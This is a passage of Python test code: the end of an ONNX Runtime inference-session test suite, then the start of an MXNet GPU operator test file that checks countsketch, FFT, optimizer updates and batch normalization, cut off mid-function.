sess.get_outputs()[0].shape self.assertEqual(output_shape, [2, 2]) output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(string)') res = sess.run([output_name], {x_name: x}) np.testing.assert_equal(x, res[0]) def testInputVoid(self): sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx")) x = np.array([b'this', b'is', b'identity', b'test'], np.void).reshape((2, 2)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "input:0") x_shape = sess.get_inputs()[0].shape self.assertEqual(x_shape, [2, 2]) x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(string)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output:0") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [2, 2]) output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(string)') res = sess.run([output_name], {x_name: x}) expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'], ['identity', 'test\x00\x00\x00\x00']], dtype=object) np.testing.assert_equal(expr, res[0]) def testZipMapStringFloat(self): sess = onnxrt.InferenceSession(self.get_name("zipmap_stringfloat.onnx")) x = np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "X") x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(float)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Z") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'seq(map(string,tensor(float)))') output_expected = [{ 'class2': 0.0, 'class1': 1.0, 'class3': 3.0 }, { 'class2': 23.0, 'class1': 44.0, 'class3': 11.0 }] res = sess.run([output_name], {x_name: x}) self.assertEqual(output_expected, res[0]) def testZipMapInt64Float(self): sess = onnxrt.InferenceSession(self.get_name("zipmap_int64float.onnx")) x = np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)) x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "X") x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'tensor(float)') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Z") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'seq(map(int64,tensor(float)))') output_expected = [{10: 1.0, 20: 0.0, 30: 3.0}, {10: 44.0, 20: 23.0, 30: 11.0}] res = sess.run([output_name], {x_name: x}) self.assertEqual(output_expected, res[0]) def testRaiseWrongNumInputs(self): with self.assertRaises(ValueError) as context: sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx")) a = np.array([[True, True], [False, False]], dtype=np.bool) res = sess.run([], {'input:0': a}) self.assertTrue('Model requires 2 inputs' in str(context.exception)) def testModelMeta(self): model_path = "../models/opset8/test_squeezenet/model.onnx" if not os.path.exists(model_path): return sess = onnxrt.InferenceSession(model_path) modelmeta = sess.get_modelmeta() self.assertEqual('onnx-caffe2', modelmeta.producer_name) self.assertEqual('squeezenet_old', modelmeta.graph_name) self.assertEqual('', modelmeta.domain) self.assertEqual('', modelmeta.description) def testProfilerWithSessionOptions(self): so = onnxrt.SessionOptions() so.enable_profiling = True sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"), sess_options=so) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) sess.run([], {'X': x}) profile_file = sess.end_profiling() tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args'] with 
open(profile_file) as f: lines = f.readlines() self.assertTrue('[' in lines[0]) for i in range(1, 8): for tag in tags: self.assertTrue(tag in lines[i]) self.assertTrue(']' in lines[8]) def testDictVectorizer(self): sess = onnxrt.InferenceSession(self.get_name("pipeline_vectorize.onnx")) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "float_input") input_type = str(sess.get_inputs()[0].type) self.assertEqual(input_type, "map(int64,tensor(float))") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, []) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "variable1") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, "tensor(float)") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [1, 1]) # Python type x = {0: 25.0, 1: 5.13, 2: 0.0, 3: 0.453, 4: 5.966} res = sess.run([output_name], {input_name: x}) output_expected = np.array([[49.752754]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) xwrong = x.copy() xwrong["a"] = 5.6 try: res = sess.run([output_name], {input_name: xwrong}) except RuntimeError as e: self.assertIn("Unexpected key type <class 'str'>, it cannot be linked to C type int64_t", str(e)) # numpy type x = {np.int64(k): np.float32(v) for k, v in x.items()} res = sess.run([output_name], {input_name: x}) output_expected = np.array([[49.752754]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) x = {np.int64(k): np.float64(v) for k, v in x.items()} res = sess.run([output_name], {input_name: x}) output_expected = np.array([[49.752754]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) x = {np.int32(k): np.float64(v) for k, v in x.items()} res = sess.run([output_name], {input_name: x}) output_expected = np.array([[49.752754]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testLabelEncoder(self): sess = onnxrt.InferenceSession(self.get_name("LabelEncoder.onnx")) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "input") input_type = str(sess.get_inputs()[0].type) self.assertEqual(input_type, "tensor(string)") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [1, 1]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "variable") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, "tensor(int64)") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [1, 1]) # Array x = np.array([['4']]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[3]], dtype=np.int64) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) # Python type x = np.array(['4'], ndmin=2) res = sess.run([output_name], {input_name: x}) output_expected = np.array([3], ndmin=2, dtype=np.int64) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) x = np.array(['4'], ndmin=2, dtype=np.object) res = sess.run([output_name], {input_name: x}) output_expected = np.array([3], ndmin=2, dtype=np.int64) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def test_run_model_mlnet(self): sess = onnxrt.InferenceSession(self.get_name("mlnet_encoder.onnx")) names = [_.name for _ in sess.get_outputs()] self.assertEqual(['C00', 'C12'], names) c0 = np.array([5.], dtype=np.float32).reshape(1, 1) c1 = np.array([b'A\0A\0', b"B\0B\0", b"C\0C\0"], np.void).reshape(1, 3) res = 
sess.run(None, {'C0': c0, 'C1': c1}) mat = res[1] total = mat.sum() self.assertEqual(total, 2) self.assertEqual(list(mat.ravel()), list(np.array([[[0., 0., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.]]]).ravel())) # In memory, the size of each element is fixed and equal to the # longest element. We cannot use bytes because numpy is trimming # every final 0 for strings and bytes before creating the array # (to save space). It does not have this behaviour for void # but as a result, numpy does not know anymore the size # of each element, they all have the same size. c1 = np.array([b'A\0A\0\0', b"B\0B\0", b"C\0C\0"], np.void).reshape(1, 3) res = sess.run(None, {'C0': c0, 'C1': c1}) mat = res[1] total = mat.sum() self.assertEqual(total, 0) def testGraphOptimizationLevel(self): opt = onnxrt.SessionOptions() # default should be all optimizations optimization self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED) sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"), sess_options=opt) a = np.array([[True, True], [False, False]], dtype=np.bool) b = np.array([[True, False], [True, False]], dtype=np.bool) res = sess.run([], {'input1:0': a, 'input:0': b}) def testSequenceLength(self): sess = onnxrt.InferenceSession(self.get_name("sequence_length.onnx")) x = [ np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)), np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)) ] x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "X") x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'seq(tensor(float))') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(int64)') output_expected = np.array(2, dtype=np.int64) res = sess.run([output_name], {x_name: x}) self.assertEqual(output_expected, res[0]) def testSequenceConstruct(self): sess = onnxrt.InferenceSession(self.get_name("sequence_construct.onnx")) self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)') self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)') self.assertEqual(sess.get_inputs()[0].name, "tensor1") self.assertEqual(sess.get_inputs()[1].name, "tensor2") output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output_sequence") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'seq(tensor(int64))') output_expected = [ np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)), np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3)) ] res = sess.run( [output_name], { "tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)), "tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3)) }) np.testing.assert_array_equal(output_expected, res[0]) def testSequenceInsert(self): opt = onnxrt.SessionOptions() opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL sess = onnxrt.InferenceSession(self.get_name("sequence_insert.onnx"), sess_options=opt) self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))') self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)') self.assertEqual(sess.get_inputs()[0].name, "input_seq") self.assertEqual(sess.get_inputs()[1].name, "tensor") output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output_sequence") output_type = 
sess.get_outputs()[0].type self.assertEqual(output_type, 'seq(tensor(int64))') output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))] res = sess.run([output_name], { "tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)), "input_seq": [] }) np.testing.assert_array_equal(output_expected, res[0]) def testOrtExecutionMode(self): opt = onnxrt.SessionOptions() self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL) opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL) def testLoadingSessionOptionsFromModel(self): try: os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1) sess = onnxrt.InferenceSession(self.get_name("model_with_valid_ort_config_json.onnx")) session_options = sess.get_session_options() self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config self.assertEqual(session_options.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config) self.assertEqual(session_options.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config self.assertEqual(session_options.enable_profiling, True) # from the ORT config except Exception: raise finally: # Make sure the usage of the feature is disabled after this test os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0) if __name__ == '__main__': unittest.main()
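# --- Illustration (not part of the original test suite) ---
# A minimal sketch of the numpy behaviour that testInputBytes, testInputVoid and
# test_run_model_mlnet above rely on: fixed-width byte ('S') arrays drop trailing
# NUL bytes when elements are read back, while np.void keeps the raw buffer intact.
# The helper below is illustrative only and is never called by the tests.
def _bytes_vs_void_sketch():
    raw = [b'A\x00A\x00', b'B\x00B\x00']
    as_bytes = np.array(raw)            # 'S'-typed: trailing \x00 are not preserved on read-back
    as_void = np.array(raw, np.void)    # 'V'-typed: every byte, including trailing \x00, is kept
    return as_bytes, as_void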
test_operator_gpu.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import print_function import sys import os import time import multiprocessing as mp import mxnet as mx import numpy as np import pytest import itertools from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose from mxnet.test_utils import check_symbolic_forward, check_symbolic_backward, discard_stderr from mxnet.test_utils import default_context, rand_shape_2d, rand_ndarray, same, environment from mxnet.base import MXNetError from mxnet import autograd curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__))) sys.path.insert(0, os.path.join(curr_path, '../unittest')) from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied from common import run_in_spawned_process from test_operator import check_sequence_reverse, allclose_function from test_operator import * from test_numpy_ndarray import * from test_numpy_op import * from test_numpy_interoperability import * from test_gluon_probability_v1 import * from test_gluon_probability_v2 import * from test_optimizer import * from test_random import * from test_exc_handling import * from test_sparse_ndarray import * from test_sparse_operator import * from test_ndarray import * from test_subgraph_op import * from test_gluon_gpu import _test_bulking from test_contrib_operator import test_multibox_target_op from test_contrib_optimizer import test_adamw del test_custom_op_fork #noqa set_default_context(mx.gpu(0)) def check_countsketch(in_dim,out_dim,n): data = mx.sym.Variable("data") h = mx.sym.Variable("h") s = mx.sym.Variable("s") sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim) shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s arr = [mx.nd.empty(shape[i]) for i in range(3)] arr_grad = [mx.nd.empty(shape[i]) for i in range(3)] x = np.random.uniform(-10, 10, shape[0]) arr[0][:] = x #input x h = np.random.randint(0, out_dim, shape[1]) arr[1][:] = h #hash h s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2]) arr[2][:] = s #hash s locations = {"data": x, "h": h, "s": s} a = np.zeros((n,out_dim)) temp = np.multiply(x, s) for num_sample in np.arange(0,n): for idx in np.arange(0,in_dim): a[num_sample][h[0][idx]] += temp[num_sample][idx] check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0)) out_grad = mx.nd.empty((n,out_dim)) out_grad[:] = np.random.normal(-3, 3, (n,out_dim)) a = np.zeros((n,in_dim)) for j in np.arange(0,n): for i in np.arange(0,in_dim): a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i] check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0)) @with_seed() @pytest.mark.serial def 
test_countsketch(): minindim = 40 maxindim = 100 minoutdim = 5 maxoutdim = 30 maxn = 200 in_dim = np.random.randint(minindim, maxindim) out_dim = np.random.randint(minoutdim, maxoutdim) n = np.random.randint(1, maxn) check_countsketch(in_dim, out_dim, n) def check_fft(shape): sym = mx.sym.contrib.fft(name='fft', compute_size = 128) if len(shape) == 2: if shape[1]%2 != 0: lst = list(shape) lst[1] = lst[1]*2 shape = tuple(lst) shape_old = shape if len(shape) == 4: if shape[3]%2 != 0: lst = list(shape) lst[3] = lst[3]*2 shape = tuple(lst) shape_old = shape init = [np.random.normal(size=shape, scale=1.0)] arr_grad = [mx.nd.empty(shape)] ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}] exe_list = [sym._simple_bind(**ctx) for ctx in ctx_list] for exe in exe_list: for arr, iarr in zip(exe.arg_arrays, init): arr[:] = iarr.astype(arr.dtype) # forward for exe in exe_list: exe.forward(is_train=True) out1 = [exe.outputs[0].asnumpy() for exe in exe_list] out = np.fft.fft(init, n=None, axis=-1, norm=None) if len(shape) == 2: out = np.reshape(out,(out.shape[1],out.shape[2])) out2 = np.append(out.real, out.imag, axis = 1) a = np.zeros(out1[0].shape) p = 0 for i in range(out2.shape[1]//2): a[:,p] = out2[:,i] a[:,p+1] = out2[:,i+out2.shape[1]//2] p = p+2 if len(shape) == 4: out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4])) out2 = np.append(out.real, out.imag, axis = 1) a = np.zeros(out1[0].shape) for i in range(out1[0].shape[0]): for j in range(out1[0].shape[1]): p = 0 for k in range(out2.shape[3]): a[i,j,:,p] = out2[i,j,:,k] a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k] p = p+2 assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5) # backward if len(shape) == 2: out_grad = mx.nd.empty((shape[0],2*shape[1])) out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1])) # out_grad_to_complex out_grad_complex = np.zeros(shape,dtype = np.complex64) for i in range(0,shape[1]): out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i] out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1] for exe in exe_list: exe.backward([out_grad]) a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None) assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5) if len(shape) == 4: out_grad = mx.nd.empty(out1[0].shape) out_grad[:] = np.random.normal(-3, 3, out1[0].shape) # out_grad_to_complex out_grad_complex = np.zeros(shape,dtype = np.complex64) for i in range(0,shape[3]): out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i] out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1] for exe in exe_list: exe.backward([out_grad]) a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None) assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5) @with_seed() def test_fft(): nrepeat = 2 maxdim = 10 for repeat in range(nrepeat): for order in [2,4]: shape = tuple(np.random.randint(1, maxdim, size=order)) check_fft(shape) def _make_ndarrays(input_list, ctx=mx.gpu(0)): return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list] def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2): values_arr = [np.random.rand(*shape).astype(dtype) * 10. 
for shape in shapes] mx_vals = _make_ndarrays(values_arr, ctx=ctx) sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes)) sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes)) # checks that operator is deterministic assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy()) ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr], dtype='float32', ctx=ctx) assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1) @with_seed() @pytest.mark.serial def test_multi_sum_sq(): min_nparam = 100 max_nparam = 120 min_dim = 50000 max_dim = 100000 max_ndim = 1 dtypes = ['float16','float32', 'float64'] for ctx in [mx.gpu(0)]: for dtype in dtypes: nparam = np.random.randint(min_nparam + 1, max_nparam + 1) shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)] low_tol = ctx == mx.cpu(0) and ('float16'in [dtype]) tol1 = 1e-3 if low_tol else 1e-5 tol2 = 1e-6 if low_tol else 1e-7 check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2) def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2): weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes] grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes] lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100. wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000. eta = (np.random.rand() + 0.1) eps = (np.random.rand() + 0.1) / 10000. mx_w = _make_ndarrays(weights_arr, ctx=ctx) mx_g = _make_ndarrays(grads_arr, ctx=ctx) mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx) mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx) w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes)) g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes)) ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr], dtype='float32', ctx=ctx) ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr], dtype='float32', ctx=ctx) assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1) assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1) rescale_grad = (np.random.rand() + 0.5) * 100. 
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps, rescale_grad=rescale_grad) ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq) ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad) ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx) for i in range(ref_w_l2norm.size): _w = ref_w_l2norm[i] _g = ref_g_l2norm[i] if _w > 0.0 and _g > 0.0: ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps) else: ref_new_lrs[i] = lrs[i] assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2) @with_seed() @pytest.mark.serial def test_fast_lars(): min_nparam = 50 max_nparam = 60 maxdim = 10000 maxndim = 1 dtypes = ['float16','float32', 'float64'] for ctx in [mx.cpu(0), mx.gpu(0)]: for w_dtype in dtypes: for g_dtype in dtypes: nparam = np.random.randint(min_nparam + 1, max_nparam + 1) shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)] lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype]) tol1 = 1e-3 if lowTol else 1e-5 tol2 = 1e-6 if lowTol else 1e-7 check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2) def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights): def _flatten_list(nested_list): return [item for sublist in nested_list for item in sublist] weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes] grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes] rescale_grad = (np.random.random() + 1.0) mx_w = _make_ndarrays(weights_arr) mx_g = _make_ndarrays(grads_arr) mx_p_w = _make_ndarrays(weights_arr) mx_p_g = _make_ndarrays(grads_arr) lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.) mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0)) wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.) 
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0)) if use_master_weights: weights32_arr = [arr.astype('float32') for arr in weights_arr] mx_w32 = _make_ndarrays(weights32_arr) mx_p_w32 = _make_ndarrays(weights32_arr) if momentum is None: if use_master_weights: mx.nd.multi_mp_sgd_update( *_flatten_list(zip(mx_w, mx_g, mx_w32)), num_weights=len(shapes), lrs=lrs, wds=wds, rescale_grad=rescale_grad, out=mx_w) mx.nd.preloaded_multi_mp_sgd_update( *(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) + [mx_lrs, mx_wds]), num_weights=len(shapes), rescale_grad=rescale_grad, out=mx_p_w) else: out = mx.nd.multi_sgd_update( *_flatten_list(zip(mx_w, mx_g)), num_weights=len(shapes), lrs=lrs, wds=wds, rescale_grad=rescale_grad, out=mx_w) preloaded_out = mx.nd.preloaded_multi_sgd_update( *(_flatten_list(zip(mx_p_w, mx_p_g)) + [mx_lrs, mx_wds]), num_weights=len(shapes), rescale_grad=rescale_grad, out=mx_p_w) else: if use_master_weights: momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes] mx_m = _make_ndarrays(momentums_arr) mx_p_m = _make_ndarrays(momentums_arr) out = mx.nd.multi_mp_sgd_mom_update( *_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)), num_weights=len(shapes), lrs=lrs, wds=wds, rescale_grad=0.95, momentum=momentum, out=mx_w) preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update( *(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) + [mx_lrs, mx_wds]), num_weights=len(shapes), rescale_grad=0.95, momentum=momentum, out=mx_p_w) else: momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes] mx_m = _make_ndarrays(momentums_arr) mx_p_m = _make_ndarrays(momentums_arr) mx.nd.multi_sgd_mom_update( *_flatten_list(zip(mx_w, mx_g, mx_m)), num_weights=len(shapes), lrs=lrs, wds=wds, rescale_grad=0.95, momentum=momentum, out=mx_w) mx.nd.preloaded_multi_sgd_mom_update( *(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) + [mx_lrs, mx_wds]), num_weights=len(shapes), rescale_grad=0.95, momentum=momentum, out=mx_p_w) def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol): for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)): assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol) if dtype == 'float16': rtol = 1e-3 atol = 1e-2 else: rtol = 1e-5 atol = 1e-6 _assert_all_almost_equal(mx_p_w, mx_w, rtol, atol) if momentum is not None: _assert_all_almost_equal(mx_p_m, mx_m, rtol, atol) if use_master_weights: _assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6) @with_seed() def test_preloaded_multi_sgd(): dtypes = ['float16', 'float32'] momentums = [None, 0.9] min_nparam = 5 max_nparam = 10 maxdim = 6 maxndim = 4 for dtype in dtypes: use_master_weights_list = [False,] if dtype == 'float32' else [True, False] for use_master_weights in use_master_weights_list: for momentum in momentums: nparam = np.random.randint(min_nparam + 1, max_nparam + 1) shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)] check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights) @with_seed() @pytest.mark.serial def test_batchnorm_with_type(): ctx_list_v2_2D = [ {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 
'type_dict': {'norm_data': np.float64}}, ] ctx_list_v2_1D = [ {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}}, ] ctx_list_v2_3D = [ {'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}} ] # V2, 2D bools = [False, True] for fix_gamma, cudnn_off in itertools.product(bools, bools): sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off) check_consistency(sym, ctx_list_v2_2D) # V2, 1D for fix_gamma, cudnn_off in itertools.product(bools, bools): sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off) check_consistency(sym, ctx_list_v2_1D) # V2, 3D for fix_gamma, cudnn_off in itertools.product(bools, [True,]): sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off) check_consistency(sym, ctx_list_v2_3D) @with_seed() @pytest.mark.serial def test_batchnorm_versions(): def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats): ctx_list = [] sym_list = [] # BatchNorm cpu if 'batchnorm_cpu' in batchnorm_op_list: ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, 